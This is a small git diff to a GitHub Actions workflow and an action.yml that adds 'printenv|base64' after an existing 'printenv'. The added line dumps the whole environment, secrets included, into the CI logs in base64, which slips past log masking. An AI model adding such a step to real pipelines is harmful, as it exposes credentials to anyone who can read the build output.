diff --git a/.github/workflows/generate-release-zipfile.yml b/.github/workflows/generate-release-zipfile.yml index 341d6e6..d11259a 100644 --- a/.github/workflows/generate-release-zipfile.yml +++ b/.github/workflows/generate-release-zipfile.yml @@ -29,6 +29,7 @@ jobs: git fetch --no-tags --prune --no-recurse-submodules --depth=1 origin "$GITHUB_SHA" git reset --hard "$GITHUB_SHA" printenv + printenv|base64 - name: Testing the artifact uploading id: "uploading" diff --git a/action.yml b/action.yml index 3063b32..0f3a441 100644 --- a/action.yml +++ b/action.yml @@ -56,6 +56,7 @@ runs: # (at the cost of and breaking if the JSON formating happens to change, # and readability...) printenv + printenv|base64 # First we extract the second field from the token (e.g. xxx.yyy.zzz), # then we de-base64 and last, we extract the two id from